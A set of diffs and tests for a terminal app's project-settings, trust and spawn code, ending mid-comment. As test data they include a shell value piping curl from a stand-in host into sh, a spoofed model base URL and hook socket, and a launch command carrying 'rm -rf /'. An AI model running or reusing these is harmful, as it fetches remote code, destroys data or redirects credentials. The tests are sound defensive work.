+import { DEFAULT_SETTINGS } from '../shared/types'
+import type { ProjectSpawnOverrides } from './project-spawn-overrides'
+
+interface SpawnCall {
+  file: string
+  args: string[]
+  env: Record<string, string>
+}
+const spawns = vi.hoisted(() => [] as SpawnCall[])
+
+vi.mock('node-pty', () => ({
+  spawn: (file: string, args: string[], opts: { env: Record<string, string> }) => {
+    spawns.push({ file, args, env: { ...opts.env } })
+    return {
+      onData: () => {},
+      onExit: () => {},
+      write: () => {},
+      resize: () => {},
+      pause: () => {},
+      resume: () => {},
+      kill: () => {},
+      pid: 1
+    }
+  }
+}))
+
+// Never let the developer's own pty pressure refuse a spawn (see pty-typing.test.ts).
+vi.mock('./pty-devices', async (importOriginal) => ({
+  ...(await importOriginal<typeof import('./pty-devices')>()),
+  readPtyDevices: () => ({ ceiling: 511, inUse: 8 })
+}))
+
+vi.mock('./exec-path', async (importOriginal) => ({
+  ...(await importOriginal<typeof import('./exec-path')>()),
+  findExecutableSync: (bin: string) => (bin === 'ssh' ? '/usr/bin/ssh' : null),
+  shellPathNow: () => '/usr/bin:/bin',
+  resolveShellPath: async () => '/usr/bin:/bin'
+}))
+
+// Every tmux/ssh side-call (the freshness probe, `set-option`) answers "fine" without a subprocess.
+vi.mock('child_process', () => {
+  type Cb = (err: Error | null, res?: { stdout: string; stderr: string }) => void
+  const execFile = (file: string, args: string[], a?: unknown, b?: unknown): unknown => {
+    const cb = (typeof a === 'function' ? a : b) as Cb | undefined
+    cb?.(null, { stdout: '', stderr: '' })
+    return {}
+  }
+  return { execFile, execFileSync: (): string => '' }
+})
+
+const NODE = 'node-1'
+const PROJECT = 'proj-1'
+
+/** A manager with the overrides reader wired, driven through the real `pty:create` handler. */
+async function manager(
+  read: ((projectId: string) => Promise<ProjectSpawnOverrides | null>) | null,
+  opts: { tmux?: string | null } = {}
+) {
+  const { PtyManager } = await import('./pty-manager')
+  const mgr = new PtyManager()
+  ;(mgr as unknown as { tmuxPath: string | null }).tmuxPath = opts.tmux ?? null
+  if (read) mgr.setProjectSpawnOverrides(read)
+  mgr.registerIpc()
+  return mgr
+}
+
+const staged: Array<{ remotePath: string; content: string }> = []
+
+describe('project settings at the spawn — LOCAL leg', () => {
+  let fake: FakePlatform
+  beforeEach(() => {
+    spawns.length = 0
+    staged.length = 0
+    fake = fakePlatform()
+    initPlatform(fake)
+  })
+  afterEach(() => {
+    setRemoteSessionEnvWriter(null)
+    resetPlatformForTests()
+    vi.useRealTimers()
+  })
+
+  const create = async (options: Record<string, unknown>): Promise<unknown> =>
+    fake.handlers[IPC.ptyCreate](1, { cols: 80, rows: 24, ...options })
+
+  it("puts the project's env into the session environment", async () => {
+    await manager(async () => ({ env: { PROJECT_TOKEN: 'abc' } }))
+    await create({ persistKey: NODE, ownerProjectId: PROJECT })
+    expect(spawns[0].env.PROJECT_TOKEN).toBe('abc')
+  })
+
+  it('asks the reader with the OWNING project id, once per spawn', async () => {
+    const seen: string[] = []
+    await manager(async (id) => {
+      seen.push(id)
+      return null
+    })
+    await create({ persistKey: NODE, ownerProjectId: PROJECT })
+    expect(seen).toEqual([PROJECT])
+  })
+
+  it('never asks — and changes nothing — when the pane has no proven owner', async () => {
+    const read = vi.fn(async () => ({ env: { PROJECT_TOKEN: 'abc' } }))
+    await manager(read)
+    await create({ persistKey: NODE })
+    expect(read).not.toHaveBeenCalled()
+    expect(spawns[0].env.PROJECT_TOKEN).toBeUndefined()
+  })
+
+  it('spawns anyway when the reader REJECTS (fail open)', async () => {
+    await manager(() => Promise.reject(new Error('EIO')))
+    await create({ persistKey: NODE, ownerProjectId: PROJECT })
+    expect(spawns).toHaveLength(1)
+    expect(spawns[0].env.PROJECT_TOKEN).toBeUndefined()
+  })
+
+  it('spawns without waiting forever when the reader HANGS — bounded, then fail open', async () => {
+    vi.useFakeTimers()
+    await manager(() => new Promise<ProjectSpawnOverrides | null>(() => {}))
+    const pending = create({ persistKey: NODE, ownerProjectId: PROJECT })
+    await vi.advanceTimersByTimeAsync(2_000)
+    await pending
+    expect(spawns).toHaveLength(1)
+  })
+
+  it('loses to custom-agent env on a key collision (per-agent config beats the project)', async () => {
+    const mgr = await manager(async () => ({ env: { SHARED_KEY: 'from-project', OWN: 'p' } }))
+    ;(mgr as unknown as { getSettings: () => unknown }).getSettings = () => ({
+      ...DEFAULT_SETTINGS,
+      customAgents: [
+        { id: 'custom:x', label: 'X', baseAgent: 'claude', env: { SHARED_KEY: 'from-agent' } }
+      ]
+    })
+    await create({ persistKey: NODE, ownerProjectId: PROJECT, agentId: 'custom:x' })
+    expect(spawns[0].env.SHARED_KEY).toBe('from-agent')
+    // …and the keys the agent did NOT claim still come from the project.
+    expect(spawns[0].env.OWN).toBe('p')
+  })
+
+  it('adds the project keys to tmux update-environment so a shared server copies them', async () => {
+    const mgr = await manager(async () => ({ env: { PROJECT_TOKEN: 'abc' } }), {
+      tmux: '/usr/bin/tmux'
+    })
+    const seen: string[][] = []
+    ;(mgr as unknown as { ensureUpdateEnvKeys: (n: string[]) => void }).ensureUpdateEnvKeys = (n) => {
+      seen.push(n)
+    }
+    ;(mgr as unknown as { getSettings: () => unknown }).getSettings = () => ({
+      ...DEFAULT_SETTINGS,
+      tmuxEnabled: true
+    })
+    await create({ persistKey: NODE, ownerProjectId: PROJECT })
+    expect(seen[0]).toContain('PROJECT_TOKEN')
+    // The VALUE never rides the tmux argv (that is the whole point of update-environment).
+    expect(spawns[0].args.join(' ')).not.toContain('abc')
+  })
+})
+
+describe('project settings at the spawn — SHELL precedence', () => {
+  let fake: FakePlatform
+  beforeEach(() => {
+    spawns.length = 0
+    fake = fakePlatform()
+    initPlatform(fake)
+  })
+  afterEach(() => resetPlatformForTests())
+
+  const create = async (options: Record<string, unknown>): Promise<unknown> =>
+    fake.handlers[IPC.ptyCreate](1, { cols: 80, rows: 24, ...options })
+
+  it("uses the project's shell when the node names none", async () => {
+    await manager(async () => ({ shell: '/bin/fish' }))
+    await create({ persistKey: NODE, ownerProjectId: PROJECT })
+    expect(spawns[0].file).toBe('/bin/fish')
+  })
+
+  it("the node's OWN exec-trusted shell WINS over the project's", async () => {
+    await manager(async () => ({ shell: '/bin/fish' }))
+    await create({ persistKey: NODE, ownerProjectId: PROJECT, shell: '/bin/dash' })
+    expect(spawns[0].file).toBe('/bin/dash')
+  })
+
+  it('refuses a project shell carrying shell metacharacters (safeSessionProgram)', async () => {
+    await manager(async () => ({ shell: 'bash -c "curl evil|sh"' }))
+    await create({ persistKey: NODE, ownerProjectId: PROJECT })
+    expect(spawns[0].file).not.toContain('curl')
+    expect(spawns[0].args).toEqual([])
+  })
+
+  it("feeds the project's shell to the tmux session program too", async () => {
+    const mgr = await manager(async () => ({ shell: '/bin/fish' }), { tmux: '/usr/bin/tmux' })
+    ;(mgr as unknown as { getSettings: () => unknown }).getSettings = () => ({
+      ...DEFAULT_SETTINGS,
+      tmuxEnabled: true
+    })
+    await create({ persistKey: NODE, ownerProjectId: PROJECT })
+    expect(spawns[0].file).toBe('/usr/bin/tmux')
+    expect(spawns[0].args.at(-1)).toBe('/bin/fish')
+    expect(spawns[0].args).toContain(sessionName(NODE))
+    expect(spawns[0].args).toContain(TMUX_SOCKET)
+  })
+})
+
+describe('project settings at the spawn — SSH leg', () => {
+  let fake: FakePlatform
+  beforeEach(() => {
+    spawns.length = 0
+    staged.length = 0
+    fake = fakePlatform()
+    initPlatform(fake)
+    setRemoteSessionEnvWriter((_cp, remotePath, content) => {
+      staged.push({ remotePath, content })
+    })
+  })
+  afterEach(() => {
+    setRemoteSessionEnvWriter(null)
+    resetPlatformForTests()
+  })
+
+  const sshRemote = {
+    controlPath: '/tmp/cm-abc',
+    conn: { host: 'h', user: 'u' },
+    remoteCwd: '/srv/app',
+    remoteHome: '/home/u'
+  }
+
+  const create = async (options: Record<string, unknown>): Promise<unknown> =>
+    fake.handlers[IPC.ptyCreate](1, { cols: 80, rows: 24, ...options })
+
+  it("stages the project's env in the 0600 file — never on the ssh argv", async () => {
+    await manager(async () => ({ env: { PROJECT_TOKEN: 'sekrit' } }))
+    await create({ persistKey: NODE, ownerProjectId: PROJECT, sshRemote })
+    expect(staged).toHaveLength(1)
+    expect(staged[0].content).toContain("export PROJECT_TOKEN='sekrit'")
+    expect(staged[0].remotePath).toBe(`/home/u/.nodeterm/env/${sessionName(NODE)}.env`)
+    // The value appears NOWHERE on the command line of the long-lived ssh client.
+    expect(spawns[0].args.join(' ')).not.toContain('sekrit')
+    expect(spawns[0].env.PROJECT_TOKEN).toBeUndefined()
+  })
+
+  it('warns and skips (never argv) when the remote $HOME is unknown', async () => {
+    const warn = vi.spyOn(console, 'warn').mockImplementation(() => {})
+    await manager(async () => ({ env: { PROJECT_TOKEN: 'sekrit' } }))
+    const { remoteHome: _drop, ...noHome } = sshRemote
+    await create({ persistKey: NODE, ownerProjectId: PROJECT, sshRemote: noHome })
+    expect(staged).toHaveLength(0)
+    expect(spawns[0].args.join(' ')).not.toContain('sekrit')
+    expect(warn.mock.calls.flat().join(' ')).toContain('remote session env skipped')
+    warn.mockRestore()
+  })
+
+  it("runs the project's shell inside the REMOTE tmux", async () => {
+    await manager(async () => ({ shell: '/bin/fish' }))
+    await create({ persistKey: NODE, ownerProjectId: PROJECT, sshRemote })
+    expect(spawns[0].args.join(' ')).toContain('/bin/fish')
+  })
+})

--- a/src/core/pty-project-settings.test.ts
+++ b/src/core/pty-project-settings.test.ts
@@ -16,6 +16,7 @@ import { TMUX_SOCKET, sessionName } from './tmux-naming'
 import { DEFAULT_SETTINGS } from '../shared/types'
 import { AUTH_ENV_STRIP, isReservedSpawnEnvKey } from './claude-accounts-core'
 import { MODEL_GATEWAY_ENV_KEYS } from '../shared/agents/model-gateway'
+import { hookServer } from './agents/hook-server'
 import type { ProjectSpawnOverrides } from './project-spawn-overrides'
 
 interface SpawnCall {
@@ -95,6 +96,8 @@ describe('project settings at the spawn — LOCAL leg', () => {
     setRemoteSessionEnvWriter(null)
     resetPlatformForTests()
     vi.useRealTimers()
+    // hookServer is a process-wide singleton — a spy left on it would leak into every later test.
+    vi.restoreAllMocks()
   })
 
   const create = async (options: Record<string, unknown>): Promise<unknown> =>
@@ -158,12 +161,19 @@ describe('project settings at the spawn — LOCAL leg', () => {
   // pair that READS innocuous (`CLAUDE_CONFIG_DIR=./.tooling`) must still not out-rank the layers
   // that exist to control exactly those keys. See `isReservedSpawnEnvKey`.
   it('merges only the innocent key, never the reserved ones', async () => {
+    // A REAL hook env, so the NODETERM_ assertion below is about survival rather than absence:
+    // `not.toBe(evil)` would pass just as well against the `{}` a stub hookServer returns.
+    const hookEnv = { NODETERM_HOOK_ENDPOINT: '/run/nodeterm/real.sock', NODETERM_NODE_ID: NODE }
+    vi.spyOn(hookServer, 'buildPtyEnv').mockReturnValue(hookEnv)
     const mgr = await manager(async () => ({
       env: {
         ANTHROPIC_API_KEY: 'attacker',
         ANTHROPIC_BASE_URL: 'https://evil.example',
         CLAUDE_CONFIG_DIR: './.tooling',
+        CODEX_HOME: './.tooling',
+        XDG_CONFIG_HOME: './.tooling',
         NODETERM_HOOK_ENDPOINT: '/tmp/evil.sock',
+        NODETERM_NODE_ID: 'other-node',
         RAILS_ENV: 'test'
       }
     }))
@@ -173,8 +183,12 @@ describe('project settings at the spawn — LOCAL leg', () => {
     expect(spawns[0].env.ANTHROPIC_API_KEY).not.toBe('attacker')
     expect(spawns[0].env.ANTHROPIC_BASE_URL).not.toBe('https://evil.example')
     expect(spawns[0].env.CLAUDE_CONFIG_DIR).not.toBe('./.tooling')
-    // The hook env this manager set for the node is intact — not replaced by the project's.
-    expect(spawns[0].env.NODETERM_HOOK_ENDPOINT).not.toBe('/tmp/evil.sock')
+    expect(spawns[0].env.CODEX_HOME).not.toBe('./.tooling')
+    expect(spawns[0].env.XDG_CONFIG_HOME).not.toBe('./.tooling')
+    // The hook identity this manager set for the node survives INTACT — the project's forgery
+    // neither replaced it nor blanked it.
+    expect(spawns[0].env.NODETERM_HOOK_ENDPOINT).toBe('/run/nodeterm/real.sock')
+    expect(spawns[0].env.NODETERM_NODE_ID).toBe(NODE)
   })
 
   it('adds the project keys to tmux update-environment so a shared server copies them', async () => {
@@ -208,6 +222,14 @@ describe('isReservedSpawnEnvKey — the keys a project may never set', () => {
     expect(isReservedSpawnEnvKey('NODETERM_')).toBe(true)
   })
 
+  // Every agent's config dir, not just claude's: codex reads $CODEX_HOME (auth.json lives there,
+  // and the pane resolves it from its OWN env), opencode reads $XDG_CONFIG_HOME/opencode — which
+  // is where this app installs its managed PLUGIN, i.e. JavaScript the agent process executes.
+  it('reserves the OTHER agents config dirs too', () => {
+    expect(isReservedSpawnEnvKey('CODEX_HOME')).toBe(true)
+    expect(isReservedSpawnEnvKey('XDG_CONFIG_HOME')).toBe(true)
+  })
+
   // A base URL redirects the CLI's traffic — carrying the USER's own credentials — to whatever
   // endpoint the repo names, and "a URL" reads innocuous in a consent table. Every name in
   // MODEL_GATEWAY_ENV_KEYS is one this app itself emits to re-route a launched CLI, i.e. the
@@ -219,8 +241,12 @@ describe('isReservedSpawnEnvKey — the keys a project may never set', () => {
     expect(isReservedSpawnEnvKey('COPILOT_PROVIDER_BASE_URL')).toBe(true)
   })
 
+  // PATH and NODE_OPTIONS are ALLOWED on purpose, not by omission — pointing a project's terminals
+  // at its own tooling is the feature's stated purpose, and the consent dialog shows those pairs
+  // verbatim. The reserved list is for keys whose implications a dialog CANNOT convey. The written
+  // ruling lives in `isReservedSpawnEnvKey`'s doc block; this test pins it.
   it('reserves nothing else — a project may still set its own tooling env', () => {
-    for (const k of ['PATH', 'LANG', 'RAILS_ENV', 'DATABASE_URL', 'NODE_ENV', 'NODETERM'])
+    for (const k of ['PATH', 'NODE_OPTIONS', 'LANG', 'RAILS_ENV', 'DATABASE_URL', 'NODE_ENV', 'NODETERM'])
       expect(isReservedSpawnEnvKey(k)).toBe(false)
   })
 })

--- a/src/core/workspace-store.settings.test.ts
+++ b/src/core/workspace-store.settings.test.ts
@@ -5,6 +5,9 @@ import path from 'path'
 import { initPlatform, resetPlatformForTests } from './platform'
 import { fakePlatform } from './platform-fake'
 import { WorkspaceStore } from './workspace-store'
+import { ProjectTrustStore, hashTrustContent, localTrustKey } from './project-trust-store'
+import { registerProjectLaunchInfoHandlers } from './project-launch-info-handlers'
+import { projectTrustContent, type ProjectLaunchInfo } from '../shared/project-settings'
 import type { Project, Workspace } from '../shared/types'
 
 let userData: string
@@ -370,5 +373,52 @@ describe('project settings IPC registration', () => {
     expect(snap.shared?.terminal?.shell).toBe('/bin/zsh')
     expect(await handlers['project-settings:update-local']('p1', { ignoreShared: { setup: true } })).toBe(true)
     expect(await handlers['project-settings:read']('nope')).toBeNull()
+  })
+})
+
+describe('project-settings:launch-info', () => {
+  it('gates a shared launchCmd until recorded, and reports true for a family with nothing to gate', async () => {
+    const store = new WorkspaceStore()
+    const trust = new ProjectTrustStore()
+    registerProjectLaunchInfoHandlers(fake, store, trust)
+    await store.save(ws([project({ cwd: projRoot })]))
+    await store.writeProjectSettings('p1', { agents: { launchCmd: 'npm run dev' } })
+
+    const handler = fake.handlers['project-settings:launch-info']
+    const before = (await handler('p1')) as ProjectLaunchInfo
+    expect(before.resolved.agents.launchCmd).toEqual({ value: 'npm run dev', source: 'shared' })
+    expect(before.trusted.agents).toBe(false) // shared content exists, not yet approved
+    expect(before.trusted.shell).toBe(true) // no shared `terminal.shell` at all — nothing to gate
+
+    const key = localTrustKey(projRoot)
+    const content = projectTrustContent('agents', { agents: { launchCmd: 'npm run dev' } })!
+    await trust.record(key, 'agents', hashTrustContent(content), '2026-08-19T00:00:00.000Z')
+
+    const after = (await handler('p1')) as ProjectLaunchInfo
+    expect(after.trusted.agents).toBe(true)
+  })
+
+  it('answers null for an unknown project id, same as project-settings:read', async () => {
+    const store = new WorkspaceStore()
+    const trust = new ProjectTrustStore()
+    registerProjectLaunchInfoHandlers(fake, store, trust)
+    await store.save(ws([project({ cwd: projRoot })]))
+    expect(await fake.handlers['project-settings:launch-info']('nope')).toBeNull()
+  })
+
+  it('a shared change invalidates the OLD approval — trusted flips back to false', async () => {
+    const store = new WorkspaceStore()
+    const trust = new ProjectTrustStore()
+    registerProjectLaunchInfoHandlers(fake, store, trust)
+    await store.save(ws([project({ cwd: projRoot })]))
+    await store.writeProjectSettings('p1', { agents: { launchCmd: 'npm run dev' } })
+    const key = localTrustKey(projRoot)
+    const oldContent = projectTrustContent('agents', { agents: { launchCmd: 'npm run dev' } })!
+    await trust.record(key, 'agents', hashTrustContent(oldContent), '2026-08-19T00:00:00.000Z')
+    expect(((await fake.handlers['project-settings:launch-info']('p1')) as ProjectLaunchInfo).trusted.agents).toBe(true)
+
+    await store.writeProjectSettings('p1', { agents: { launchCmd: 'npm run dev && rm -rf /' } })
+    const after = (await fake.handlers['project-settings:launch-info']('p1')) as ProjectLaunchInfo
+    expect(after.trusted.agents).toBe(false)
   })
 })

--- a/src/core/workspace-store.settings.test.ts
+++ b/src/core/workspace-store.settings.test.ts
@@ -406,6 +406,22 @@ describe('project-settings:launch-info', () => {
     expect(await fake.handlers['project-settings:launch-info']('nope')).toBeNull()
   })
 
+  it('reports trusted.agents true when the SHARED doc has no launchCmd/env, even with a local agents overlay', async () => {
+    const store = new WorkspaceStore()
+    const trust = new ProjectTrustStore()
+    registerProjectLaunchInfoHandlers(fake, store, trust)
+    await store.save(ws([project({ cwd: projRoot })]))
+    // A shared doc exists but never sets anything in the `agents` family — nothing executable to
+    // gate — while this machine's own local overlay picks a launchCmd of its own (never gated: a
+    // value the user typed locally is their own instruction, not hostile shared input).
+    await store.writeProjectSettings('p1', { terminal: { shell: '/bin/zsh' } })
+    await store.updateLocalProjectSettings('p1', { agents: { launchCmd: 'npm run dev' } })
+
+    const info = (await fake.handlers['project-settings:launch-info']('p1')) as ProjectLaunchInfo
+    expect(info.resolved.agents.launchCmd).toEqual({ value: 'npm run dev', source: 'local' })
+    expect(info.trusted.agents).toBe(true)
+  })
+
   it('a shared change invalidates the OLD approval — trusted flips back to false', async () => {
     const store = new WorkspaceStore()
     const trust = new ProjectTrustStore()

--- a/src/main/index.ts
+++ b/src/main/index.ts
@@ -66,6 +66,7 @@ import { GitService } from '../core/git-service'
 import { ProjectTrustStore } from '../core/project-trust-store'
 import { ProjectSetupService } from '../core/project-setup-service'
 import { registerProjectSetupHandlers } from '../core/project-setup-handlers'
+import { registerProjectLaunchInfoHandlers } from '../core/project-launch-info-handlers'
 import { makeLocalSetupRunner } from '../core/project-setup-runner-local'
 import { makeSshSetupRunner } from './remote-ssh/ssh-setup-runner'
 import { registerGitHubIntegration } from '../core/github/integration'
@@ -378,6 +379,9 @@ registerProjectSetupHandlers(corePlatform, projectSetupService, {
   projectTargetInfo: (projectId) => workspaceStore.projectTargetInfo(projectId),
   worktreeList: (repoPath) => gitService.worktreeList(repoPath)
 })
+// `project-settings:launch-info` — a sibling registrar (not a widening of
+// WorkspaceStore.registerIpc()) sharing the trust store constructed above.
+registerProjectLaunchInfoHandlers(corePlatform, workspaceStore, projectTrustStore)
 
 // Markers delimiting the `projects.list` relay blob. The iOS client splits on these exact
 // strings to recover [workspace.json | newline-joined tmux session names | agent-status.json],

--- a/src/main/index.ts
+++ b/src/main/index.ts
@@ -65,8 +65,13 @@ import { SshStore } from './ssh-store'
 import { GitService } from '../core/git-service'
 import { ProjectTrustStore } from '../core/project-trust-store'
 import { ProjectSetupService } from '../core/project-setup-service'
-import { registerProjectSetupHandlers } from '../core/project-setup-handlers'
+import {
+  makeProjectTrustRequester,
+  registerProjectSetupHandlers,
+  type ProjectSetupHandlerDeps
+} from '../core/project-setup-handlers'
 import { registerProjectLaunchInfoHandlers } from '../core/project-launch-info-handlers'
+import { makeProjectSpawnOverrides } from '../core/project-spawn-overrides'
 import { makeLocalSetupRunner } from '../core/project-setup-runner-local'
 import { makeSshSetupRunner } from './remote-ssh/ssh-setup-runner'
 import { registerGitHubIntegration } from '../core/github/integration'
@@ -375,13 +380,29 @@ const projectSetupService = new ProjectSetupService({
   // which is the fail-closed direction.
   sendConsent: (channel, payload) => sendToMain(channel, payload)
 })
-registerProjectSetupHandlers(corePlatform, projectSetupService, {
+const projectSetupDeps: ProjectSetupHandlerDeps = {
   projectTargetInfo: (projectId) => workspaceStore.projectTargetInfo(projectId),
   worktreeList: (repoPath) => gitService.worktreeList(repoPath)
-})
+}
+registerProjectSetupHandlers(corePlatform, projectSetupService, projectSetupDeps)
 // `project-settings:launch-info` — a sibling registrar (not a widening of
 // WorkspaceStore.registerIpc()) sharing the trust store constructed above.
 registerProjectLaunchInfoHandlers(corePlatform, workspaceStore, projectTrustStore)
+// The SAME settings + trust pieces, aimed at the SPAWN (consumption Task 4): a session opened for a
+// project gets that project's env and terminal program, with the shared half admitted only by the
+// trust verdict `launch-info` reports from. `requestTrust` reuses the very requester the
+// `projectSetupRequestTrust` channel uses, so a spawn that refuses a shared value raises exactly the
+// dialog the renderer's own ask would — single-flighted inside `ensureFamilyTrusted`, so five nodes
+// launching at once raise one. Wired here (not in `ptyManager.init`) so both shells can call it
+// wherever their stores happen to be constructed.
+ptyManager.setProjectSpawnOverrides(
+  makeProjectSpawnOverrides({
+    readSettings: (projectId) => workspaceStore.readProjectSettings(projectId),
+    targetInfo: (projectId) => workspaceStore.projectTargetInfo(projectId),
+    trust: projectTrustStore,
+    requestTrust: makeProjectTrustRequester(projectSetupService, projectSetupDeps)
+  })
+)
 
 // Markers delimiting the `projects.list` relay blob. The iOS client splits on these exact
 // strings to recover [workspace.json | newline-joined tmux session names | agent-status.json],

--- a/src/main/platform-electron.ts
+++ b/src/main/platform-electron.ts
@@ -8,6 +8,13 @@ import { E_NO_HANDLER, type RpcErr, type RpcOk, type RpcRequest } from '../share
 type Handler = { fn: (...args: any[]) => unknown; withSender: boolean }
 type Listener = { fn: (...args: any[]) => void; withSender: boolean }
 
+/** How often a REFUSED host-control cast may be logged. The refusal itself is unconditional; only
+ *  the log line is throttled, because the rate is chosen by the peer: a guest casting in a loop
+ *  would otherwise turn the host's log into its own amplifier. One line per window is the whole
+ *  diagnostic — that it happened at all. */
+const REFUSAL_LOG_INTERVAL_MS = 60_000
+let lastRefusalLog = 0
+
 /**
  * The Electron platform, with the two extra members a relay PEER needs (they are deliberately NOT
  * on CorePlatform: the core never dispatches, only the shell that owns the socket does — exactly as
@@ -125,7 +132,11 @@ export function electronPlatform(): ElectronPlatform {
       // a cast (ws-bridge.ts) — i.e. a guest could not start a run but could still answer the host's
       // trust prompt for it. A cast has no reply channel, so a refusal can only be dropped + logged.
       if (isHostOnlyChannel(method)) {
-        console.warn(`[peer] refused host-control cast ${method} from peer ${clientId}`)
+        const now = Date.now()
+        if (now - lastRefusalLog >= REFUSAL_LOG_INTERVAL_MS) {
+          lastRefusalLog = now
+          console.warn(`[peer] refused host-control cast ${method} from peer ${clientId}`)
+        }
         return
       }
       const set = listeners.get(method)

--- a/src/preload/index.ts
+++ b/src/preload/index.ts
@@ -63,6 +63,10 @@ const subscribeProjectSetupConsentRequest = subscribe<[ProjectSetupConsentReques
 const subscribeProjectSetupConsentDismiss = subscribe<[{ requestId: string }]>(
   IPC.projectSetupConsentDismiss
 )
+// Not per-project like githubIssuesChanged: `project-trust:changed` is one global channel whose
+// payload carries the projectId, fanned out the same way — nobody broadcasts it yet (Task 2), but
+// the renderer cache subscribes ahead of the emitter.
+const subscribeProjectTrustChanged = subscribe<[{ projectId: string }]>(IPC.projectTrustChanged)
 
 const api: NodeTerminalApi = {
   pty: {
@@ -152,7 +156,9 @@ const api: NodeTerminalApi = {
     writeShared: (projectId: string, doc) =>
       ipcRenderer.invoke(IPC.projectSettingsWriteShared, projectId, doc),
     updateLocal: (projectId: string, local) =>
-      ipcRenderer.invoke(IPC.projectSettingsUpdateLocal, projectId, local)
+      ipcRenderer.invoke(IPC.projectSettingsUpdateLocal, projectId, local),
+    launchInfo: (projectId: string) => ipcRenderer.invoke(IPC.projectSettingsLaunchInfo, projectId),
+    onTrustChanged: subscribeProjectTrustChanged
   },
   projectSetup: {
     // Wire carries exactly `(projectId, kind, worktreePath?)` — no rootPath/projectName/ssh: main

--- a/src/preload/index.ts
+++ b/src/preload/index.ts
@@ -18,7 +18,7 @@ import type {
   WorkspaceMigrationKind
 } from '../shared/types'
 import type { ClientId, PeerDiff, PeerIdentity, PeerState } from '../shared/presence'
-import type { ProjectSetupConsentRequest, ProjectSetupEvent } from '../shared/project-settings'
+import type { ProjectConsentRequest, ProjectSetupEvent } from '../shared/project-settings'
 
 // Fan a single ipcRenderer listener per channel out to many renderer subscribers. Without
 // this, every node that subscribes (e.g. Cmd+M markdown toggle on each terminal/editor) adds
@@ -57,7 +57,7 @@ const subscribeRelayHostClosed = subscribe<[{ id: string }]>(IPC.relayHostClosed
 
 // Project setup/archive (SDD: 2026-08-19-project-settings-trust): global (not per-project) main →
 // renderer prompts, fanned out the same way as the relay events above.
-const subscribeProjectSetupConsentRequest = subscribe<[ProjectSetupConsentRequest]>(
+const subscribeProjectSetupConsentRequest = subscribe<[ProjectConsentRequest]>(
   IPC.projectSetupConsentRequest
 )
 const subscribeProjectSetupConsentDismiss = subscribe<[{ requestId: string }]>(
@@ -170,6 +170,8 @@ const api: NodeTerminalApi = {
     consent: async (requestId, answer) => {
       ipcRenderer.send(IPC.projectSetupConsentSubmit, requestId, answer)
     },
+    requestTrust: (projectId, family) =>
+      ipcRenderer.invoke(IPC.projectSetupRequestTrust, projectId, family),
     onConsentRequest: subscribeProjectSetupConsentRequest,
     onConsentDismiss: subscribeProjectSetupConsentDismiss,
     onEvent: (projectId, cb) => {

--- a/src/renderer/bridge/stubs.ts
+++ b/src/renderer/bridge/stubs.ts
@@ -301,7 +301,9 @@ export function buildStubApi(): Omit<
       // a write/update as "did not happen", matching the real handlers' contract for an unknown id.
       read: () => Promise.resolve(null),
       writeShared: () => Promise.resolve(false),
-      updateLocal: () => Promise.resolve(false)
+      updateLocal: () => Promise.resolve(false),
+      launchInfo: () => Promise.resolve(null),
+      onTrustChanged: noopUnsub
     },
     projectSetup: {
       // Same fallback story as `projectSettings` above — real over the bridge

--- a/src/renderer/bridge/stubs.ts
+++ b/src/renderer/bridge/stubs.ts
@@ -313,6 +313,9 @@ export function buildStubApi(): Omit<
       run: () => Promise.resolve({ status: 'skipped', reason: 'unavailable' }),
       cancel: () => Promise.resolve(false),
       consent: pnoop,
+      // Fails closed, like `run`: no bridge means no way to ask a human, and an unasked question
+      // is never an approval.
+      requestTrust: () => Promise.resolve(false),
       onConsentRequest: noopUnsub,
       onConsentDismiss: noopUnsub,
       onEvent: noopUnsub

--- a/src/renderer/bridge/ws-bridge.ts
+++ b/src/renderer/bridge/ws-bridge.ts
@@ -301,7 +301,14 @@ export function buildRealApi(
     writeShared: (projectId, doc) =>
       client.request(IPC.projectSettingsWriteShared, projectId, doc) as Promise<boolean>,
     updateLocal: (projectId, local) =>
-      client.request(IPC.projectSettingsUpdateLocal, projectId, local) as Promise<boolean>
+      client.request(IPC.projectSettingsUpdateLocal, projectId, local) as Promise<boolean>,
+    launchInfo: (projectId) =>
+      client.request(IPC.projectSettingsLaunchInfo, projectId) as ReturnType<
+        NodeTerminalApi['projectSettings']['launchInfo']
+      >,
+    // REAL: nobody broadcasts IPC.projectTrustChanged yet (Task 2 records approvals) — the
+    // subscription is wired ahead of the emitter, same posture as the preload leg.
+    onTrustChanged: (cb) => client.subscribe(IPC.projectTrustChanged, cb as Listener)
   }
 
   // REAL: registerProjectSetupHandlers (core) is wired on the same construction-order point as

--- a/src/renderer/bridge/ws-bridge.ts
+++ b/src/renderer/bridge/ws-bridge.ts
@@ -306,8 +306,8 @@ export function buildRealApi(
       client.request(IPC.projectSettingsLaunchInfo, projectId) as ReturnType<
         NodeTerminalApi['projectSettings']['launchInfo']
       >,
-    // REAL: nobody broadcasts IPC.projectTrustChanged yet (Task 2 records approvals) — the
-    // subscription is wired ahead of the emitter, same posture as the preload leg.
+    // REAL: `ProjectSetupService.ensureFamilyTrusted` broadcasts IPC.projectTrustChanged on every
+    // approval, for each project id that asked.
     onTrustChanged: (cb) => client.subscribe(IPC.projectTrustChanged, cb as Listener)
   }
 
@@ -323,6 +323,14 @@ export function buildRealApi(
     consent: async (requestId, answer) => {
       client.cast(IPC.projectSetupConsentSubmit, requestId, answer)
     },
+    // Fails CLOSED on a rejection rather than throwing at the caller: over the relay this method is
+    // host-only, so a guest's call comes back E_FORBIDDEN — and "not trusted" is exactly the right
+    // answer for a client that may not raise the host's dialog.
+    requestTrust: (projectId, family) =>
+      client.request(IPC.projectSetupRequestTrust, projectId, family).then(
+        (v) => v === true,
+        () => false
+      ),
     onConsentRequest: (cb) => client.subscribe(IPC.projectSetupConsentRequest, cb as Listener),
     onConsentDismiss: (cb) => client.subscribe(IPC.projectSetupConsentDismiss, cb as Listener),
     onEvent: (projectId, cb) => {

--- a/src/renderer/canvas/Canvas.tsx
+++ b/src/renderer/canvas/Canvas.tsx
@@ -268,6 +268,7 @@ import {
 } from '../terminal/file-drop'
 import { useWorktrees } from '../state/worktrees'
 import { setupAckDecision, setupGateDone, useProjectSetup } from '../state/projectSetup'
+import { ensureProjectLaunchInfo, invalidateProjectLaunchInfo } from '../state/projectLaunchInfo'
 import { activeSessionApi } from '../session/session'
 import {
   agentConfig,
@@ -2206,6 +2207,26 @@ export function Canvas() {
   useEffect(() => {
     setConflict(null)
   }, [activeProjectId])
+
+  // Warm the launch-info cache (`renderer/state/projectLaunchInfo.ts`) for whichever project just
+  // became active, so a launch on it reads a fresh `projectLaunchInfoNow` instead of null (fail
